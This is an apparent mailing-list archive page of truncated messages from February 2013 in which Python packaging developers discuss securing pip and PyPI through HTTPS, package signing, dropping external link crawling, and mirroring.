On Tue, Feb 5, 2013 at 8:42 AM, M.-A. Lemburg m...@egenix.com wrote:
On 05.02.2013 02:36, Nick Coghlan wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
the Python community is to run sudo pip with
On 05.02.2013 09:02, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 8:42 AM, M.-A. Lemburg m...@egenix.com wrote:
On 05.02.2013 02:36, Nick Coghlan wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
On Tue, Feb 5, 2013 at 9:11 AM, M.-A. Lemburg m...@egenix.com wrote:
The solution Nick proposed also has another issue: it would
install packages meant for a virtualenv in the user's site
packages dir (outside the virtualenv)... If pip used the user
site packages by default (when running as
On Tue, Feb 5, 2013 at 10:19 AM, Lennart Regebro rege...@gmail.com wrote:
On Tue, Feb 5, 2013 at 9:11 AM, M.-A. Lemburg m...@egenix.com wrote:
Looks like a slippery road if you try to make pip guess
what the right installation dir should be, e.g. by trying
to detect that it's running in a
Il giorno 05/feb/2013, alle ore 02:36, Nick Coghlan ncogh...@gmail.com ha
scritto:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
the Python community is to run sudo pip with unsigned packages
On Tue, Feb 5, 2013 at 10:57 AM, Giovanni Bajo ra...@develer.com wrote:
One meta-question: does this mailing-list have any authority over pip?
Nope. And none over Distribute/Setuptools either.
Are there any pip maintainers here?
Yes, at least one. But the more the merrier as they may have
On Tue, Feb 5, 2013 at 10:16 AM, Lennart Regebro rege...@gmail.com wrote:
We do also have at least one Distribute maintainer on the list. For
Setuptools it would be best if Distribute and Setuptools could be
merged.
+1 on this. On #python we daily get people asking about bugs in setuptools,
On Tue, Feb 5, 2013 at 7:57 PM, Giovanni Bajo ra...@develer.com wrote:
One meta-question: does this mailing-list have any authority over pip? Are
there any pip maintainers here? Because I see that pip development being done
on different channels, so I was wondering what is the workflow to
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No scraping of websites as at least easy_install/buildout does, no
downloading from external download links. A deprecation period for
this of a couple of months,
On Feb 5, 2013, at 7:51 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No scraping of websites as at least easy_install/buildout does, no
downloading from
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.comwrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No scraping of websites as at least easy_install/buildout does, no
downloading
On Feb 5, 2013, at 8:02 AM, Holger Krekel holger.kre...@gmail.com wrote:
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.com wrote:
PyPI will need to change for this to happen realistically if I recall. There
is a hard limit on how large of a distribution can be uploaded to PyPI
and there are, if I recall, valid distributions which are larger than
On Tue, Feb 5, 2013 at 2:05 PM, Jesse Noller jnol...@gmail.com wrote:
On Feb 5, 2013, at 8:02 AM, Holger Krekel holger.kre...@gmail.com wrote:
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.comwrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1.
On Tuesday, February 5, 2013 at 8:06 AM, Lennart Regebro wrote:
Anyone know which ones? scipy is the largest I know of, at 6-7 MB.
Someone told me once (Richard maybe?) I think the one mentioned was
one of the GUI toolkits? If there is one I'm sure there are others so if that
is a direction
On Tue, Feb 5, 2013 at 2:02 PM, Holger Krekel holger.kre...@gmail.com wrote:
Dropping the crawling over external pages needs _much_ more than just a few
months deprecation warnings, rather years. There are many packages out
there, and it would break people's installations.
No it won't.
On Tuesday, February 5, 2013 at 8:13 AM, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 2:02 PM, Holger Krekel holger.kre...@gmail.com
(mailto:holger.kre...@gmail.com) wrote:
Dropping the crawling over external pages needs _much_ more than just a few
months deprecation warnings, rather
On Tue, Feb 5, 2013 at 2:18 PM, Donald Stufft donald.stu...@gmail.com wrote:
A longer depreciation wouldn't be a bad thing merely because a lot
of people depend on this feature without even realizing it. Crate has
an index you can use that removes all external urls to test your own
projects
On Tuesday, February 5, 2013 at 8:34 AM, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 2:18 PM, Donald Stufft donald.stu...@gmail.com
(mailto:donald.stu...@gmail.com) wrote:
A longer depreciation wouldn't be a bad thing merely because a lot
of people depend on this feature without even
At Tue, 5 Feb 2013 11:36:46 +1000,
Nick Coghlan wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
the Python community is to run sudo pip with unsigned packages
(sometimes on untrusted networks).
On 05.02.2013 14:06, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.com wrote:
PyPI will need to change for this to happen realistically if I recall. There
is a hard limit on how large of a distribution can be uploaded to PyPI
and there are, if I
On 05.02.2013 14:18, Donald Stufft wrote:
On Tuesday, February 5, 2013 at 8:13 AM, Lennart Regebro wrote:
That will mean that a man in the middle-attack might poison PyPI's
cache. I don't think that's a feasible path forward.
Packages does not need to be cached, as they are not supposed to
On Tue, Feb 5, 2013 at 2:13 PM, Lennart Regebro rege...@gmail.com wrote:
On Tue, Feb 5, 2013 at 2:02 PM, Holger Krekel holger.kre...@gmail.com
wrote:
Dropping the crawling over external pages needs _much_ more than just a
few
months deprecation warnings, rather years. There are many
On Tue, Feb 5, 2013 at 11:55 PM, Jeroen Dekkers jer...@dekkers.ch wrote:
At Tue, 5 Feb 2013 11:36:46 +1000,
Nick Coghlan wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
the Python community is to
On Tue, Feb 5, 2013 at 9:28 AM, Donald Stufft donald.stu...@gmail.comwrote:
On Tuesday, February 5, 2013 at 9:24 AM, Daniel Holth wrote:
As long as you are trusting PyPI itself, a PyPI-hosted/signed/timestamped
SHA2 hash of the file to be downloaded from an external host would be
enough to
Il giorno 05/feb/2013, alle ore 15:34, Daniel Holth dho...@gmail.com ha
scritto:
On Tue, Feb 5, 2013 at 9:28 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 9:24 AM, Daniel Holth wrote:
As long as you are trusting PyPI itself, a PyPI-hosted/signed/timestamped
Il giorno 05/feb/2013, alle ore 15:06, Holger Krekel holger.kre...@gmail.com
ha scritto:
In the end, however, none of this prevents MITM attacks between a downloader
and pypi.python.org. Or between the uploader and pypi.python.org (using
basic auth over http often). Signing methods like
On Tue, Feb 5, 2013 at 5:16 AM, Lennart Regebro rege...@gmail.com wrote:
...
1. Packages should only be installed from the given package indexes.
No scraping of websites as at least easy_install/buildout does, no
downloading from external download links. A deprecation period for
this of a
On Tue, Feb 5, 2013 at 2:42 PM, Donald Stufft donald.stu...@gmail.com wrote:
If you break peoples ability to install packages right away they'll refuse
to upgrade.
Good point. We want the problems to be fixed, not avoided.
One thing just struck me: We have the maintainer emails of mots
On Wed, Feb 6, 2013 at 12:46 AM, Giovanni Bajo ra...@develer.com wrote:
Il giorno 05/feb/2013, alle ore 15:06, Holger Krekel
holger.kre...@gmail.com ha scritto:
In the end, however, none of this prevents MITM attacks between a downloader
and pypi.python.org. Or between the uploader and
On Tue, Feb 05, 2013 at 15:46 +0100, Giovanni Bajo wrote:
Il giorno 05/feb/2013, alle ore 15:06, Holger Krekel
holger.kre...@gmail.com ha scritto:
In the end, however, none of this prevents MITM attacks between a
downloader and pypi.python.org. Or between the uploader and
On Wed, Feb 6, 2013 at 12:54 AM, Jim Fulton j...@zope.com wrote:
pip will need to learn to prefer non-final releases.
I was pressed to put buildout alpha and beta releases on a separate site
because of the concern that they'd be installed inadvertently by pip.
FWIW, PEP 426 aims to address
On Tuesday, February 5, 2013 at 9:54 AM, Jim Fulton wrote:
pip will need to learn to prefer non-final releases.
PEP426 states this as part of it's requirements so I expect all package
tools to move that way, and, at the risk of promising time I don't have,
if someone else doesn't make pip do
Il giorno 05/feb/2013, alle ore 15:57, Nick Coghlan ncogh...@gmail.com ha
scritto:
On Wed, Feb 6, 2013 at 12:46 AM, Giovanni Bajo ra...@develer.com wrote:
Il giorno 05/feb/2013, alle ore 15:06, Holger Krekel
holger.kre...@gmail.com ha scritto:
In the end, however, none of this prevents
On Tuesday, February 5, 2013 at 9:53 AM, holger krekel wrote:
Point taken. I guess unless someone sits down and writes a PEP-ish path for
fortification, it's gonna be hard to assess viability and resilience
against the several attack vectors which should be sorted/prioritized.
Or is somebody
On Tue, Feb 5, 2013 at 3:06 PM, Holger Krekel holger.kre...@gmail.com wrote:
I wouldn't assume that maintainers are easily reachable. I've contacted at
least three people of different (1K downloads) packages which never
responded.
We really can't do very much about abandoned packages.
And
On Tuesday, February 5, 2013 at 10:06 AM, Giovanni Bajo wrote:
I do agree; in fact, I'm not the one suggesting to eg. pinning CA
certificates.
What I'm saying is that it's far more important to fix HTTPS in PyPI than to
verify GPG signatures. So when I hear the argument if we just verify
On Wed, Feb 6, 2013 at 1:06 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 9:53 AM, holger krekel wrote:
Point taken. I guess unless someone sits down and writes a PEP-ish path for
fortification, it's gonna be hard to assess viability and resilience
against
On Tue, Feb 5, 2013 at 3:24 PM, Daniel Holth dho...@gmail.com wrote:
As long as you are trusting PyPI itself, a PyPI-hosted/signed/timestamped
SHA2 hash of the file to be downloaded from an external host would be enough
to detect tampering over time.
Hm. The discussion about signatures of
On Tue, Feb 05, 2013 at 16:07 +0100, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 3:06 PM, Holger Krekel holger.kre...@gmail.com wrote:
I wouldn't assume that maintainers are easily reachable. I've contacted at
least three people of different (1K downloads) packages which never
responded.
On Tuesday, February 5, 2013 at 10:14 AM, holger krekel wrote:
Transporting almost all externally reachable packages to be locally pypi
served is also kind of a low hanging fruit, although probably slightly
higher hanging than SSL :) The point is that we can have some control over
those
On Tue, Feb 5, 2013 at 4:14 PM, holger krekel hol...@merlinux.eu wrote:
Sure, and that's another problem, and the low-hanging fruit there is
using https.
Transporting almost all externally reachable packages to be locally pypi
served is also kind of a low hanging fruit, although probably
On Tue, Feb 05, 2013 at 10:18 -0500, Donald Stufft wrote:
On Tuesday, February 5, 2013 at 10:14 AM, holger krekel wrote:
Transporting almost all externally reachable packages to be locally pypi
served is also kind of a low hanging fruit, although probably slightly
higher hanging than SSL :)
On Tuesday, February 5, 2013 at 10:41 AM, holger krekel wrote:
MITM attacking any of the many world-wide pypi/easy_install downloads
from external sites is much easier than tampering a few one-time
downloads (verified against each other) for pypi.python.org
(http://pypi.python.org)'s
On Tue, Feb 5, 2013 at 5:03 PM, Donald Stufft donald.stu...@gmail.com wrote:
Besides the issues with validating that the package We are mirroring
is the authentic one there's also a legal issue. We don't know for sure
that we have the legal rights to redistribute those files. When you upload
a
Hello,
M.-A. Lemburg mal at egenix.com writes:
If pip used the user site packages by default (when running as anyone
other than root), that dangerous UI flow wouldn't happen. Even when
pip was run outside a virtualenv, it would just work from the users
perspective. It also has the
On Tue, Feb 5, 2013 at 2:21 PM, Christian Heimes christ...@python.orgwrote:
Hello,
I like to discuss my proposal for a package signing and verification
process. It's just a brief draft and not a final document. (Credits to
my friend Marcus Brinkmann for additional insights).
Package
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
W dniu 05.02.2013 20:21, Christian Heimes pisze:
User installs package -
process: - tool retrieves the package and the combined signature
file (PyPI's signature, metadata file and embedded signature of the
uploader) - tool
On Tuesday, February 5, 2013 at 2:34 PM, Daniel Holth wrote:
There is a well-engineered framework out there already:
https://www.updateframework.com/wiki/SecuringPythonPackageManagement
To my knowledge this depends on PyPI remaining
On Tuesday, February 5, 2013 at 2:21 PM, Christian Heimes wrote:
Hello,
I like to discuss my proposal for a package signing and verification
process. It's just a brief draft and not a final document. (Credits to
my friend Marcus Brinkmann for additional insights).
Package maintainer
On 2/5/2013 11:35 AM, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 5:03 PM, Donald Stufft donald.stu...@gmail.com wrote:
Besides the issues with validating that the package We are mirroring
is the authentic one there's also a legal issue. We don't know for sure
that we have the legal rights to
On 2/5/2013 8:02 AM, Jesse Noller wrote:
On Feb 5, 2013, at 7:51 AM, Donald Stufft donald.stu...@gmail.com
mailto:donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No scraping
On Tuesday, February 5, 2013 at 4:02 PM, Terry Reedy wrote:
On 2/5/2013 8:02 AM, Jesse Noller wrote:
On Feb 5, 2013, at 7:51 AM, Donald Stufft donald.stu...@gmail.com
(mailto:donald.stu...@gmail.com)
mailto:donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16
On Tuesday, February 5, 2013 at 4:04 PM, Donald Stufft wrote:
On Tuesday, February 5, 2013 at 4:02 PM, Terry Reedy wrote:
Why is downloading form
code.google.com (http://code.google.com), for instance, worse than from
pypi.python.org (http://pypi.python.org)?
On Tuesday, February 5, 2013 at 4:02 PM, Terry Reedy wrote:
Why is downloading form
code.google.com (http://code.google.com), for instance, worse than from
pypi.python.org (http://pypi.python.org)?
http://prettytable.googlecode.com/files/prettytable-0.6.tar.gz
^ What secures that (totally
Il giorno 05/feb/2013, alle ore 20:21, Christian Heimes christ...@python.org
ha scritto:
Hello,
I like to discuss my proposal for a package signing and verification
process. It's just a brief draft and not a final document. (Credits to
my friend Marcus Brinkmann for additional insights).
Am 05.02.2013 21:23, schrieb Donald Stufft:
* Do we have bindings to GPG that we can use?
* If not are we going to depend on users to install GPG?
* GPG installation can be tricky, especially for someone new to
programming.
Linux and BSD come with GPG installed or easily
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
W dniu 05.02.2013 21:23, Donald Stufft pisze:
* Do we have bindings to GPG that we can use?
There are some gpg bindings but my visibility is limited to Linux
world. GPG wrappers that talk to it using standardized input/output
format exist if you
On Tue, Feb 5, 2013 at 9:54 PM, Terry Reedy tjre...@udel.edu wrote:
The last I read (and I cannot find the seemingly hidden page) the author (or
rights-holder) of code must grant PSF something more than just
redistribution rights before uploading it. The same must also certify some
mumbo-jumbo
On Tue, Feb 5, 2013 at 10:13 PM, Giovanni Bajo ra...@develer.com wrote:
- An uploader must be able to revoke her keys from PyPI without
access to her private key.
This is already implemented, an user can modify her listed GPG fingerprint.
This is not different from, eg:, the page that
readthedocs.org is awesome, and seems to be gaining wider adoption. While
it is an independent project, I wonder if it serves the Python community well
to also have packages.python.org for documentation.
What about combining efforts, possibly with p.p.o as a mirror for rtd?
Cheers,
-Barry
On Tue, Feb 05, 2013 at 15:54 -0500, Terry Reedy wrote:
On 2/5/2013 11:35 AM, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 5:03 PM, Donald Stufft donald.stu...@gmail.com
wrote:
Besides the issues with validating that the package We are mirroring
is the authentic one there's also a legal
On Wed, Feb 6, 2013 at 12:33 AM, Jesse Noller jnol...@gmail.com wrote:
Read the docs is partially funded by the PSF. I'd happily increase that grant
and support it even more. For most projects it has become the defacto
location for sphinx based documentation.
I'm +100 on supporting it more,
On Feb 5, 2013, at 6:47 PM, Lennart Regebro rege...@gmail.com wrote:
On Wed, Feb 6, 2013 at 12:33 AM, Jesse Noller jnol...@gmail.com wrote:
Read the docs is partially funded by the PSF. I'd happily increase that
grant and support it even more. For most projects it has become the defacto
On Tuesday, February 5, 2013 at 6:49 PM, Jesse Noller wrote:
On Feb 5, 2013, at 6:47 PM, Lennart Regebro rege...@gmail.com
(mailto:rege...@gmail.com) wrote:
On Wed, Feb 6, 2013 at 12:33 AM, Jesse Noller jnol...@gmail.com
(mailto:jnol...@gmail.com) wrote:
Read the docs is partially
On 6 February 2013 10:47, Lennart Regebro rege...@gmail.com wrote:
On Wed, Feb 6, 2013 at 12:33 AM, Jesse Noller jnol...@gmail.com wrote:
Read the docs is partially funded by the PSF. I'd happily increase that
grant and support it even more. For most projects it has become the defacto
On 6 February 2013 00:09, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 8:06 AM, Lennart Regebro wrote:
Anyone know which ones? scipy is the largest I know of, at 6-7 MB.
Someone told me once (Richard maybe?) I think the one mentioned was
one of the GUI
67 matches
Mail list logo